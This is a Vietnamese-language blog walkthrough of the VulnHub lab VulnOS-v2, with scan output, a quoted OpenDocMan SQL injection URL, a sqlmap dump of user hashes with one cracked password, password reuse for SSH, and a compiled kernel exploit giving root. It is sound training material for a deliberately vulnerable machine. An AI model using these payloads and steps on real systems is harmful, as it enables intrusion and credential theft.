<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Open+Sans:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","version":"8.1.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"},"path":"/search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}};
  </script>
<meta name="description" content="OverviewLink download: VULNOS: 2Difficulty: EasyĐuỵt moẹ, phải nói là cái bài củ lìn này nhiều trap thực sự, đi mò mẫm mất thời gian vcl mà toàn rabbit hole.">
<meta property="og:type" content="article">
<meta property="og:title" content="[VulnHub] VulnOS-v2">
<meta property="og:url" content="http://example.com/2021/02/01/vulnos-vulnhub/index.html">
<meta property="og:site_name" content="TARS">
<meta property="og:description" content="OverviewLink download: VULNOS: 2Difficulty: EasyĐuỵt moẹ, phải nói là cái bài củ lìn này nhiều trap thực sự, đi mò mẫm mất thời gian vcl mà toàn rabbit hole.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2021/02/01/vulnos-vulnhub/1.png">
<meta property="og:image" content="http://example.com/2021/02/01/vulnos-vulnhub/2.png">
<meta property="og:image" content="http://example.com/2021/02/01/vulnos-vulnhub/3.png">
<meta property="og:image" content="http://example.com/2021/02/01/vulnos-vulnhub/4.png">
<meta property="og:image" content="http://example.com/2021/02/01/vulnos-vulnhub/5.png">
<meta property="og:image" content="http://example.com/2021/02/01/vulnos-vulnhub/6.png">
<meta property="og:image" content="http://example.com/2021/02/01/vulnos-vulnhub/7.png">
<meta property="article:published_time" content="2021-02-01T08:40:23.000Z">
<meta property="article:modified_time" content="2021-02-05T15:57:10.151Z">
<meta property="article:author" content="minhnq22">
<meta property="article:tag" content="vulnhub">
<meta property="article:tag" content="easy">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/02/01/vulnos-vulnhub/1.png">


<link rel="canonical" href="http://example.com/2021/02/01/vulnos-vulnhub/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>
<title>[VulnHub] VulnOS-v2 | TARS</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-188223675"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'UA-188223675');
      }
    </script>



  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">TARS</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description"><i>"Everybody good? Plenty of slaves for my robot colony?"</i></p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>Search
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="Searching..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <section class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Overview"><span class="nav-number">1.</span> <span class="nav-text">Overview</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Information-Gathering"><span class="nav-number">2.</span> <span class="nav-text">Information Gathering</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Nmap"><span class="nav-number">2.1.</span> <span class="nav-text">Nmap</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Dirsearch"><span class="nav-number">2.2.</span> <span class="nav-text">Dirsearch</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Sqlmap"><span class="nav-number">2.3.</span> <span class="nav-text">Sqlmap</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Privilege-Escalation"><span class="nav-number">3.</span> <span class="nav-text">Privilege Escalation</span></a></li></ol></div>
        </section>
        <!--/noindex-->

        <section class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="minhnq22"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">minhnq22</p>
  <div class="site-description" itemprop="description">#####</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="mailto:quangminhnguyen2201@gmail.com" title="E-Mail → mailto:quangminhnguyen2201@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://github.com/minhnq22" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;minhnq22" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.facebook.com/minhnq22" title="Facebook → https:&#x2F;&#x2F;www.facebook.com&#x2F;minhnq22" rel="noopener" target="_blank"><i class="fab fa-facebook fa-fw"></i>Facebook</a>
      </span>
  </div>



        </section>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/02/01/vulnos-vulnhub/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="minhnq22">
      <meta itemprop="description" content="#####">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="TARS">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          [VulnHub] VulnOS-v2
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>

      <time title="Created: 2021-02-01 15:40:23" itemprop="dateCreated datePublished" datetime="2021-02-01T15:40:23+07:00">2021-02-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/VulnHub/" itemprop="url" rel="index"><span itemprop="name">VulnHub</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="Views">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">Views: </span>
      <span class="firestore-visitors-count"></span>
    </span>
    <span class="post-meta-item" title="Reading time">
      <span class="post-meta-item-icon">
        <i class="far fa-clock"></i>
      </span>
      <span class="post-meta-item-text">Reading time &asymp;</span>
      <span>5 mins.</span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="Overview"><a href="#Overview" class="headerlink" title="Overview"></a>Overview</h2><p>Link download: <a target="_blank" rel="noopener" href="https://www.vulnhub.com/entry/vulnos-2,147/">VULNOS: 2</a><br>Difficulty: Easy<br>Đuỵt moẹ, phải nói là cái bài củ lìn này nhiều trap thực sự, đi mò mẫm mất thời gian vcl mà toàn rabbit hole.</p>
<a id="more"></a>
<h2 id="Information-Gathering"><a href="#Information-Gathering" class="headerlink" title="Information Gathering"></a>Information Gathering</h2><h3 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">$ nmap -sn -v <span class="token number">10.10</span>.10.102-105
Starting Nmap <span class="token number">7.91</span> <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2021</span>-02-03 <span class="token number">15</span>:39 +07
Initiating Ping Scan at <span class="token number">15</span>:39
Scanning <span class="token number">4</span> hosts <span class="token punctuation">[</span><span class="token number">2</span> ports/host<span class="token punctuation">]</span>
Completed Ping Scan at <span class="token number">15</span>:39, <span class="token number">1</span>.20s elapsed <span class="token punctuation">(</span><span class="token number">4</span> total hosts<span class="token punctuation">)</span>
Initiating Parallel DNS resolution of <span class="token number">1</span> host. at <span class="token number">15</span>:39
Completed Parallel DNS resolution of <span class="token number">1</span> host. at <span class="token number">15</span>:39, <span class="token number">0</span>.04s elapsed
Nmap scan report <span class="token keyword">for</span> <span class="token number">10.10</span>.10.102 <span class="token punctuation">[</span>host down<span class="token punctuation">]</span>
Nmap scan report <span class="token keyword">for</span> <span class="token number">10.10</span>.10.103
Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00058s latency<span class="token punctuation">)</span>.
Nmap scan report <span class="token keyword">for</span> <span class="token number">10.10</span>.10.104 <span class="token punctuation">[</span>host down<span class="token punctuation">]</span>
Nmap scan report <span class="token keyword">for</span> <span class="token number">10.10</span>.10.105 <span class="token punctuation">[</span>host down<span class="token punctuation">]</span>
Read data files from: /usr/bin/<span class="token punctuation">..</span>/share/nmap

$ nmap -p- <span class="token number">10.10</span>.10.103 --min-rate <span class="token number">3000</span>
Starting Nmap <span class="token number">7.91</span> <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2021</span>-02-03 <span class="token number">15</span>:39 +07
Nmap scan report <span class="token keyword">for</span> <span class="token number">10.10</span>.10.103
Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00013s latency<span class="token punctuation">)</span>.
Not shown: <span class="token number">65532</span> closed ports
PORT     STATE SERVICE
<span class="token number">22</span>/tcp   <span class="token function">open</span>  <span class="token function">ssh</span>
<span class="token number">80</span>/tcp   <span class="token function">open</span>  http
<span class="token number">6667</span>/tcp <span class="token function">open</span>  irc

Nmap done: <span class="token number">1</span> IP address <span class="token punctuation">(</span><span class="token number">1</span> <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> <span class="token number">1.05</span> seconds

$ nmap -p <span class="token number">22,80</span>,6667 -A <span class="token number">10.10</span>.10.103   
Starting Nmap <span class="token number">7.91</span> <span class="token punctuation">(</span> https://nmap.org <span class="token punctuation">)</span> at <span class="token number">2021</span>-02-03 <span class="token number">15</span>:41 +07
Nmap scan report <span class="token keyword">for</span> <span class="token number">10.10</span>.10.103
Host is up <span class="token punctuation">(</span><span class="token number">0</span>.00064s latency<span class="token punctuation">)</span>.

PORT     STATE SERVICE VERSION
<span class="token number">22</span>/tcp   <span class="token function">open</span>  <span class="token function">ssh</span>     OpenSSH <span class="token number">6.6</span>.1p1 Ubuntu 2ubuntu2.6 <span class="token punctuation">(</span>Ubuntu Linux<span class="token punctuation">;</span> protocol <span class="token number">2.0</span><span class="token punctuation">)</span>
<span class="token operator">|</span> ssh-hostkey: 
<span class="token operator">|</span>   <span class="token number">1024</span> f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b <span class="token punctuation">(</span>DSA<span class="token punctuation">)</span>
<span class="token operator">|</span>   <span class="token number">2048</span> ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 <span class="token punctuation">(</span>RSA<span class="token punctuation">)</span>
<span class="token operator">|</span>   <span class="token number">256</span> ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 <span class="token punctuation">(</span>ECDSA<span class="token punctuation">)</span>
<span class="token operator">|</span>_  <span class="token number">256</span> <span class="token number">71</span>:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 <span class="token punctuation">(</span>ED25519<span class="token punctuation">)</span>
<span class="token number">80</span>/tcp   <span class="token function">open</span>  http    Apache httpd <span class="token number">2.4</span>.7 <span class="token variable"><span class="token punctuation">((</span>Ubuntu<span class="token punctuation">))</span></span>
<span class="token operator">|</span>_http-server-header: Apache/2.4.7 <span class="token punctuation">(</span>Ubuntu<span class="token punctuation">)</span>
<span class="token operator">|</span>_http-title: VulnOSv2
<span class="token number">6667</span>/tcp <span class="token function">open</span>  irc     ngircd
Service Info: Host: irc.example.net<span class="token punctuation">;</span> OS: Linux<span class="token punctuation">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="token builtin class-name">.</span>
Nmap done: <span class="token number">1</span> IP address <span class="token punctuation">(</span><span class="token number">1</span> <span class="token function">host</span> up<span class="token punctuation">)</span> scanned <span class="token keyword">in</span> <span class="token number">18.66</span> seconds<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>Có cái cổng 6667 chạy dịch vụ đéo gì kia, <em>irc</em>, wtf!? Không vội cắm mặt vào cái này, chả đi đến đâu đâu, tôi thử rồi :/<br>Tập trung vào cái http server của nó đã.<br><img src="1.png"><br>Nhìn cái mặt tiền web site này u tối như chợ đen (đen đúng nghĩa đen). <em>Enumerate</em> cái URL này để kiếm file ẩn.</p>
<h3 id="Dirsearch"><a href="#Dirsearch" class="headerlink" title="Dirsearch"></a>Dirsearch</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token punctuation">..</span>.bla<span class="token punctuation">..</span>.bla<span class="token punctuation">..</span>.bla<span class="token punctuation">..</span>.
<span class="token punctuation">[</span><span class="token number">22</span>:05:27<span class="token punctuation">]</span> <span class="token number">200</span> -   10KB - /jabc/includes/
<span class="token punctuation">[</span><span class="token number">22</span>:05:27<span class="token punctuation">]</span> <span class="token number">200</span> -  117KB - /jabc/includes/bootstrap.inc
<span class="token punctuation">[</span><span class="token number">22</span>:05:27<span class="token punctuation">]</span> <span class="token number">200</span> -    9KB - /jabc/index.php
<span class="token punctuation">[</span><span class="token number">22</span>:05:27<span class="token punctuation">]</span> <span class="token number">200</span> -    3KB - /jabc/install.php
<span class="token punctuation">[</span><span class="token number">22</span>:05:28<span class="token punctuation">]</span> <span class="token number">301</span> -  315B  - /jabc/misc  -<span class="token operator">></span>  http://10.10.10.103/jabc/misc/
<span class="token punctuation">[</span><span class="token number">22</span>:05:28<span class="token punctuation">]</span> <span class="token number">301</span> -  318B  - /jabc/modules  -<span class="token operator">></span>  http://10.10.10.103/jabc/modules/
<span class="token punctuation">[</span><span class="token number">22</span>:05:28<span class="token punctuation">]</span> <span class="token number">200</span> -    9KB - /jabc/modules/
<span class="token punctuation">[</span><span class="token number">22</span>:05:31<span class="token punctuation">]</span> <span class="token number">301</span> -  319B  - /jabc/profiles  -<span class="token operator">></span>  http://10.10.10.103/jabc/profiles/
<span class="token punctuation">[</span><span class="token number">22</span>:05:31<span class="token punctuation">]</span> <span class="token number">200</span> -  743B  - /jabc/profiles/standard/standard.info
<span class="token punctuation">[</span><span class="token number">22</span>:05:31<span class="token punctuation">]</span> <span class="token number">200</span> -  278B  - /jabc/profiles/testing/testing.info
<span class="token punctuation">[</span><span class="token number">22</span>:05:31<span class="token punctuation">]</span> <span class="token number">200</span> -  271B  - /jabc/profiles/minimal/minimal.info
<span class="token punctuation">[</span><span class="token number">22</span>:05:31<span class="token punctuation">]</span> <span class="token number">200</span> -    2KB - /jabc/robots.txt
<span class="token punctuation">[</span><span class="token number">22</span>:05:32<span class="token punctuation">]</span> <span class="token number">301</span> -  318B  - /jabc/scripts  -<span class="token operator">></span>  http://10.10.10.103/jabc/scripts/
<span class="token punctuation">[</span><span class="token number">22</span>:05:32<span class="token punctuation">]</span> <span class="token number">200</span> -  949B  - /jabc/scripts/
<span class="token punctuation">[</span><span class="token number">22</span>:05:32<span class="token punctuation">]</span> <span class="token number">301</span> -  316B  - /jabc/sites  -<span class="token operator">></span>  http://10.10.10.103/jabc/sites/
<span class="token punctuation">[</span><span class="token number">22</span>:05:33<span class="token punctuation">]</span> <span class="token number">301</span> -  320B  - /jabc/templates  -<span class="token operator">></span>  http://10.10.10.103/jabc/templates/
<span class="token punctuation">[</span><span class="token number">22</span>:05:33<span class="token punctuation">]</span> <span class="token number">200</span> -  976B  - /jabc/templates/
<span class="token punctuation">[</span><span class="token number">22</span>:05:34<span class="token punctuation">]</span> <span class="token number">301</span> -  317B  - /jabc/themes  -<span class="token operator">></span>  http://10.10.10.103/jabc/themes/
<span class="token punctuation">[</span><span class="token number">22</span>:05:34<span class="token punctuation">]</span> <span class="token number">200</span> -    2KB - /jabc/themes/
<span class="token punctuation">[</span><span class="token number">22</span>:05:34<span class="token punctuation">]</span> <span class="token number">403</span> -    4KB - /jabc/update.php
<span class="token punctuation">[</span><span class="token number">22</span>:05:35<span class="token punctuation">]</span> <span class="token number">200</span> -   42B  - /jabc/xmlrpc.php<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>Nền tảng Drupal, phiên bản 7.26, kiếm được ở đâu thì ở đây nhé.<br><em>/jabc/profiles/standard/standard.info</em></p>
<pre class="line-numbers language-none"><code class="language-none">Information added by Drupal.org packaging script on 2014-01-15
version &#x3D; &quot;7.26&quot;
project &#x3D; &quot;drupal&quot;
datestamp &#x3D; &quot;1389815930&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>Cái đìn địz! Cái chỗ file/folder này khiến tôi mất thời gian thực sự nhiều, toàn trap hết, đây là kết luận của tôi sau 15 phút mò mẫm hết cái đống này và chả kiếm chác thêm được gì có giá trị. Quay trở lại với mặt tiền đen xì xì kia, có đoạn này.<br><img src="2.png"><br>Cái trò nền đen chữ đen này xưa như trái đất rồi nhé tml!<br>Login vào một web site khác với tài khoản và mật khẩu là guest/guest.<br><em>Cảm thấy tiếc thời gian vào cái đống file enumerate vcl</em><br><img src="3.png"><br>Để ý thấy OpenDocMan v1.2.7. Search lỗi về thằng này ngay và luôn.<br><img src="4.png"><br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/32075">https://www.exploit-db.com/exploits/32075</a></p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell"><span class="token number">1</span><span class="token punctuation">)</span> SQL Injection <span class="token keyword">in</span> OpenDocMan: CVE-2014-1945

The vulnerability exists due to insufficient validation of <span class="token string">"add_value"</span> HTTP GET parameter <span class="token keyword">in</span> <span class="token string">"/ajax_udf.php"</span> script. A remote unauthenticated attacker can execute arbitrary SQL commands <span class="token keyword">in</span> application's database.

The exploitation example below displays version of the MySQL server:

http://<span class="token punctuation">[</span>host<span class="token punctuation">]</span>/ajax_udf.php?q<span class="token operator">=</span><span class="token number">1</span><span class="token operator">&amp;</span><span class="token assign-left variable">add_value</span><span class="token operator">=</span>odm_user%20UNION%20SELECT%201,v
ersion%28%29,3,4,5,6,7,8,9<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>Rõ ràng =)) ném thằng vào Sqlmap chứ còn gì nữa.</p>
<h3 id="Sqlmap"><a href="#Sqlmap" class="headerlink" title="Sqlmap"></a>Sqlmap</h3><pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">Database: jabcd0cs                                                                                                       
Table: odm_user
<span class="token punctuation">[</span><span class="token number">3</span> entries<span class="token punctuation">]</span>
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
<span class="token operator">|</span> <span class="token function">id</span> <span class="token operator">|</span> Email              <span class="token operator">|</span> phone       <span class="token operator">|</span> password                                 <span class="token operator">|</span> username <span class="token operator">|</span> last_name <span class="token operator">|</span> department <span class="token operator">|</span> first_name <span class="token operator">|</span> pw_reset_code <span class="token operator">|</span>
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
<span class="token operator">|</span> <span class="token number">1</span>  <span class="token operator">|</span> webmin@example.com <span class="token operator">|</span> <span class="token number">5555551212</span>  <span class="token operator">|</span> b78aae356709f8c31118ea613980954b         <span class="token operator">|</span> webmin   <span class="token operator">|</span> min       <span class="token operator">|</span> <span class="token number">2</span>          <span class="token operator">|</span> web        <span class="token operator">|</span> <span class="token operator">&lt;</span>blank<span class="token operator">></span>       <span class="token operator">|</span>
<span class="token operator">|</span> <span class="token number">2</span>  <span class="token operator">|</span> guest@example.com  <span class="token operator">|</span> <span class="token number">555</span> <span class="token number">5555555</span> <span class="token operator">|</span> 084e0343a0486ff05530df6c705c8bb4 <span class="token punctuation">(</span>guest<span class="token punctuation">)</span> <span class="token operator">|</span> guest    <span class="token operator">|</span> guest     <span class="token operator">|</span> <span class="token number">2</span>          <span class="token operator">|</span> guest      <span class="token operator">|</span> NULL          <span class="token operator">|</span>
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><img src="5.png"><br><code>b78aae356709f8c31118ea613980954b:webmin1980</code><br>Đến đây lại mất thêm thời gian để mò mẫm xem admin có làm gì được thêm không, có upload file, enable extention file để upload shell bla bla… đều đéo được :)<br>Một kinh nghiệm được rút ra khi tôi làm bài Writeup-HackTheBox, đó là tài khoản đăng nhập trên Http server hoàn toàn có thể đăng nhập được cả trên SSH, vì sao? Vì con người ấy mà, để tránh phải nhớ nhiều account trên một hệ thống, họ thường có xu hướng để cmn giống hệt nhau.<br>Xét cho cùng, thì con người vẫn luôn là điểm yếu nhất của hệ thống.<br><img src="6.png"></p>
<h2 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h2><p>Vì có được mật khẩu của user webmin, nên tôi không ngại khoản chạy lệnh sudo, chỉ là sudoer đéo cho tôi vào danh sách thôi :v<br>Để ý thấy phiên bản kernel hệ điều hành đang chạy là 3.13, hàng cổ đấy, và tôi biết thừa là nó dính lỗi leo quyền vì tôi từng gặp rồi :)))<br><a target="_blank" rel="noopener" href="https://www.exploit-db.com/exploits/33824">https://www.exploit-db.com/exploits/33824</a><br><img src="7.png"></p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">webmin@VulnOSv2:~/duma$ gcc <span class="token number">37292</span>.c -o i_am_groot
webmin@VulnOSv2:~/duma$ ./i_am_groot 
spawning threads
<span class="token function">mount</span> <span class="token comment">#1</span>
<span class="token function">mount</span> <span class="token comment">#2</span>
child threads <span class="token keyword">done</span>
/etc/ld.so.preload created
creating shared library
<span class="token comment"># id</span>
<span class="token assign-left variable">uid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">gid</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span> <span class="token assign-left variable">groups</span><span class="token operator">=</span><span class="token number">0</span><span class="token punctuation">(</span>root<span class="token punctuation">)</span>,1001<span class="token punctuation">(</span>webmin<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>Done!</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/vulnhub/" rel="tag"># vulnhub</a>
              <a href="/tags/easy/" rel="tag"># easy</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/01/28/writeup-hackthebox/" rel="prev" title="[HackTheBox] Writeup">
                  <i class="fa fa-chevron-left"></i> [HackTheBox] Writeup
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/02/03/dc9-vulnhub/" rel="next" title="[VulnHub] DC-9">
                  [VulnHub] DC-9 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>







<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>
</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">minhnq22</span>
</div>
